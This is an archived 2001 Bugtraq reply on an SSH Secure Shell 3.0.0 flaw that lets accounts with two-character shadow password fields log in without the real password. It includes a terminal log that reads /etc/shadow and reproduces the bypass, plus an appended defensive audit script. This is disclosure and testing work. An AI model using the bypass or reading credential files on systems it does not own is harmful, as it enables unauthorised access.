Bugtraq mailing list archives

Re: URGENT SECURITY ADVISORY FOR SSH SECURE SHELL 3.0.0


From: "Jen B." <jen () sedition org>
Date: Sat, 21 Jul 2001 04:47:53 -0400 (EDT)



<from SSH's advisory>
in SSH Secure Shell 3.0.0, for Unix only, concerning
accounts with password fields consisting of two or
fewer characters.

I've tested this on a few machines that I recently upgraded
and have a nit to pick with the "or fewer" portion of this statement.
It's quite late here and I feel I am stating the elementary;
further comments and corrections would be very helpful.

On RH 6.2 some of the password fields are
nulled in /etc/shadow with "*" and some with "!!"

The only accounts vulnerable to this bug were the ones using "!!"
or any other two-character combinations that I tried. I replaced
the offending accounts with a single character and was unable to log in
with the "ease" that I had before. I tested on Debian 2.2 and
RedHat 6.2. It is worth noting that Debian does NOT null logins in
/etc/shadow using two characters by default like Red Hat.

btw, I also tested on FreeBSD-4.2 and was unable to log in
without providing the proper password regardless of the number of
characters I had in the password field.


-Jen
jen () sedition org

debian:~# telnet localhost 22
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
SSH-2.0-3.0.0 SSH Secure Shell (non-commercial)

Connection closed by foreign host.
debian:~# uname -a
Linux debian 2.4.6-pre3 #4 SMP Tue Jun 26 12:34:37 EST 2001 ppc unknown
debian:~# cat /etc/shadow | grep irc
irc:!!:11498:0:99999:7:::
debian:~# ssh -l irc localhost
irc's password:
Authentication successful.
Last login: Sat Jul 21 2001 01:44:01 -0500
No mail.
irc@debian:~$
debian:~# vi /etc/shadow
...
debian:~# cat /etc/shadow | grep irc
irc:!:11498:0:99999:7:::
debian:~# ssh -l irc localhost
irc's password:
irc's password:
irc's password:
warning: Authentication failed.
Disconnected; no more authentication methods available (No further
authentication methods available.).
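
An audit for the condition discussed in this message, added here as an example and not part of the original post or of SSH's advisory: it lists accounts in a shadow-format file whose password field is two characters or fewer and labels the two-character case the post reproduced. The function names and the sample records are constructed for illustration.

```shell
#!/bin/sh
# audit_shadow [FILE...]: read shadow-format records (from FILE or stdin)
# and print "user:length:class" for every account whose password field
# is two characters or fewer, the range named in the advisory.
audit_shadow() {
    awk -F: '
        /^#/ || /^[ \t]*$/ { next }   # skip comments and blank lines
        NF < 2             { next }   # not a user:password:... record
        {
            n = length($2)
            if (n > 2) next           # longer fields are out of scope
            if (n == 2)      class = "two-char"  # case reproduced in the post ("!!")
            else if (n == 1) class = "one-char"  # in the advisory range; the post could not reproduce it
            else             class = "empty"     # zero-length field
            printf "%s:%d:%s\n", $1, n, class
        }
    ' "$@"
}

# Constructed sample records in /etc/shadow layout (not taken from a real host).
sample_shadow() {
    cat <<'EOF'
root:$1$abcdefgh$0123456789abcdefghijkl:11498:0:99999:7:::
irc:!!:11498:0:99999:7:::
daemon:*:11498:0:99999:7:::
games:!:11498:0:99999:7:::
nopw::11498:0:99999:7:::
EOF
}

# Demonstration on the constructed sample. On a real system, run
# "audit_shadow /etc/shadow" as root, since the file is not world-readable.
sample_shadow | audit_shadow
```

Accounts reported as two-char are the ones to re-lock or fix before exposing an affected sshd; the one-char and empty rows are listed so the result can be compared against the advisory's wider wording.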